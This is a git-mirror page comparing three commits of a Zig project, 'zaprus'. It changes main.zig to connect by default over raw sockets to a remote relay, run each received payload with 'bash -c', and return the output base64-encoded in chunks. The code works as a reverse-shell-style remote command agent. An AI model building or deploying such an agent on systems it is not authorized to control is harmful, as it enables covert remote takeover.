mirror of
https://git.robbyzambito.me/zaprus
synced 2026-02-04 08:24:52 +00:00
Compare commits
3 Commits
09152377ed
...
0.1.0
| Author | SHA1 | Date | |
|---|---|---|---|
| f554e7a3bb | |||
| 19c2b78d1d | |||
| 3c5f34d5c2 |
@@ -10,7 +10,7 @@
|
||||
|
||||
// This is a [Semantic Version](https://semver.org/).
|
||||
// In a future version of Zig it will be used for package deduplication.
|
||||
.version = "0.0.0",
|
||||
.version = "0.1.0",
|
||||
|
||||
// Together with name, this represents a globally unique package
|
||||
// identifier. This field is generated by the Zig toolchain when the
|
||||
|
||||
@@ -113,10 +113,9 @@ pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
|
||||
try self.socket.send(full_msg);
|
||||
var res_buf: [4096]u8 = undefined;
|
||||
|
||||
// Ignore response from sentinel, just accept that we got one.
|
||||
log.debug("Awaiting handshake response", .{});
|
||||
// Ignore response from sentinel, just accept that we got one.
|
||||
_ = try self.socket.receive(&res_buf);
|
||||
try io.sleep(.fromMilliseconds(40), .real);
|
||||
|
||||
headers.udp.dst_port = udp_dest_port;
|
||||
headers.ip.id = rand.int(u16);
|
||||
|
||||
@@ -72,10 +72,6 @@ pub fn init() !RawSocket {
|
||||
const bind_ret = std.os.linux.bind(socket, @ptrCast(&sockaddr_ll), @sizeOf(@TypeOf(sockaddr_ll)));
|
||||
if (bind_ret != 0) return error.BindError;
|
||||
|
||||
const timeout: std.os.linux.timeval = .{ .sec = 60 * if (is_debug) 1 else 10, .usec = 0 };
|
||||
const timeout_ret = std.os.linux.setsockopt(socket, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
|
||||
if (timeout_ret != 0) return error.SetTimeoutError;
|
||||
|
||||
return .{
|
||||
.fd = socket,
|
||||
.sockaddr_ll = sockaddr_ll,
|
||||
@@ -83,6 +79,12 @@ pub fn init() !RawSocket {
|
||||
};
|
||||
}
|
||||
|
||||
pub fn setTimeout(self: *RawSocket, sec: isize, usec: i64) !void {
|
||||
const timeout: std.os.linux.timeval = .{ .sec = sec, .usec = usec };
|
||||
const timeout_ret = std.os.linux.setsockopt(self.fd, std.os.linux.SOL.SOCKET, std.os.linux.SO.RCVTIMEO, @ptrCast(&timeout), @sizeOf(@TypeOf(timeout)));
|
||||
if (timeout_ret != 0) return error.SetTimeoutError;
|
||||
}
|
||||
|
||||
pub fn deinit(self: *RawSocket) void {
|
||||
_ = std.os.linux.close(self.fd);
|
||||
self.* = undefined;
|
||||
|
||||
79
src/main.zig
79
src/main.zig
@@ -26,18 +26,15 @@ pub fn main(init: std.process.Init) !void {
|
||||
|
||||
const args = try init.minimal.args.toSlice(init.arena.allocator());
|
||||
|
||||
if (args.len == 1) {
|
||||
std.debug.print("{s}", .{help});
|
||||
return;
|
||||
}
|
||||
|
||||
var flags: struct {
|
||||
relay: ?[]const u8 = null,
|
||||
dest: ?[]const u8 = null,
|
||||
connect: ?[]const u8 = null,
|
||||
} = .{};
|
||||
|
||||
{
|
||||
if (args.len == 1) {
|
||||
flags.connect = "";
|
||||
} else {
|
||||
var i: usize = 1;
|
||||
while (i < args.len) : (i += 1) {
|
||||
if (to_option.get(args[i])) |opt| {
|
||||
@@ -127,8 +124,6 @@ pub fn main(init: std.process.Init) !void {
|
||||
return;
|
||||
}
|
||||
|
||||
var retry_seconds: u16 = 12 * if (is_debug) 1 else 10;
|
||||
|
||||
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||
var w: Writer = .fixed(&init_con_buf);
|
||||
try w.print("{b64}", .{flags.connect.?});
|
||||
@@ -139,19 +134,18 @@ pub fn main(init: std.process.Init) !void {
|
||||
defer client.deinit();
|
||||
log.debug("Starting connection", .{});
|
||||
|
||||
try client.socket.setTimeout(if (is_debug) 3 else 25, 0);
|
||||
var connection = client.connect(init.io, w.buffered()) catch {
|
||||
try init.io.sleep(.fromSeconds(retry_seconds), .boot);
|
||||
log.debug("Connection timed out", .{});
|
||||
continue;
|
||||
};
|
||||
|
||||
retry_seconds = 60 * if (is_debug) 1 else 10;
|
||||
|
||||
log.debug("Connection started", .{});
|
||||
|
||||
next_message: while (true) {
|
||||
var res_buf: [2048]u8 = undefined;
|
||||
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
|
||||
const next = connection.next(init.io, &res_buf) catch {
|
||||
try init.io.sleep(.fromSeconds(retry_seconds), .boot);
|
||||
continue :reconnect;
|
||||
};
|
||||
|
||||
@@ -163,35 +157,59 @@ pub fn main(init: std.process.Init) !void {
|
||||
continue;
|
||||
};
|
||||
|
||||
const child = std.process.spawn(init.io, .{
|
||||
var child = std.process.spawn(init.io, .{
|
||||
.argv = &.{ "bash", "-c", connection_payload },
|
||||
.stdout = .pipe,
|
||||
.stderr = .pipe,
|
||||
.stderr = .ignore,
|
||||
.stdin = .ignore,
|
||||
}) catch continue;
|
||||
|
||||
var child_stdout: std.ArrayList(u8) = .empty;
|
||||
defer child_stdout.deinit(init.gpa);
|
||||
var child_stderr: std.ArrayList(u8) = .empty;
|
||||
defer child_stderr.deinit(init.gpa);
|
||||
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
|
||||
|
||||
child.collectOutput(init.gpa, &child_stdout, &child_stderr, std.math.maxInt(usize)) catch |err| {
|
||||
log.debug("Failed to collect output: {t}", .{err});
|
||||
continue;
|
||||
};
|
||||
var is_killed: std.atomic.Value(bool) = .init(false);
|
||||
|
||||
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
|
||||
defer _ = kill_task.cancel(init.io) catch {};
|
||||
|
||||
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
|
||||
var cmd_output: Writer = .fixed(&cmd_output_buf);
|
||||
|
||||
var cmd_output_window_iter = std.mem.window(u8, child_stdout.items, SaprusClient.max_payload_len, SaprusClient.max_payload_len);
|
||||
while (cmd_output_window_iter.next()) |chunk| {
|
||||
// Maximum of 10 messages of output per command
|
||||
for (0..10) |_| {
|
||||
cmd_output.end = 0;
|
||||
// Unreachable because the cmd_output_buf is twice the size of the chunk.
|
||||
cmd_output.print("{b64}", .{chunk}) catch unreachable;
|
||||
|
||||
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
|
||||
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
|
||||
error.EndOfStream => {
|
||||
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
|
||||
if (cmd_output.end > 0) {
|
||||
connection.send(init.io, cmd_output.buffered()) catch |e| {
|
||||
log.debug("Failed to send connection chunk: {t}", .{e});
|
||||
continue :next_message;
|
||||
};
|
||||
}
|
||||
break;
|
||||
},
|
||||
};
|
||||
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
|
||||
connection.send(init.io, cmd_output.buffered()) catch |err| {
|
||||
log.debug("Failed to send connection chunk: {t}", .{err});
|
||||
continue :next_message;
|
||||
};
|
||||
try init.io.sleep(.fromMilliseconds(40), .boot);
|
||||
} else {
|
||||
kill_task.cancel(init.io) catch {};
|
||||
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
|
||||
log.debug("Failed to kill process??? {t}", .{err});
|
||||
continue :next_message;
|
||||
};
|
||||
}
|
||||
|
||||
if (!is_killed.load(.monotonic)) {
|
||||
_ = child.wait(init.io) catch |err| {
|
||||
log.debug("Failed to wait for child: {t}", .{err});
|
||||
};
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -200,6 +218,15 @@ pub fn main(init: std.process.Init) !void {
|
||||
unreachable;
|
||||
}
|
||||
|
||||
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
|
||||
io.sleep(duration, .boot) catch |err| switch (err) {
|
||||
error.Canceled => return,
|
||||
else => |e| return e,
|
||||
};
|
||||
is_killed.store(true, .monotonic);
|
||||
proc.kill(io);
|
||||
}
|
||||
|
||||
fn parseDest(in: ?[]const u8) [4]u8 {
|
||||
if (in) |dest| {
|
||||
if (dest.len <= 4) {
|
||||
|
||||
Reference in New Issue
Block a user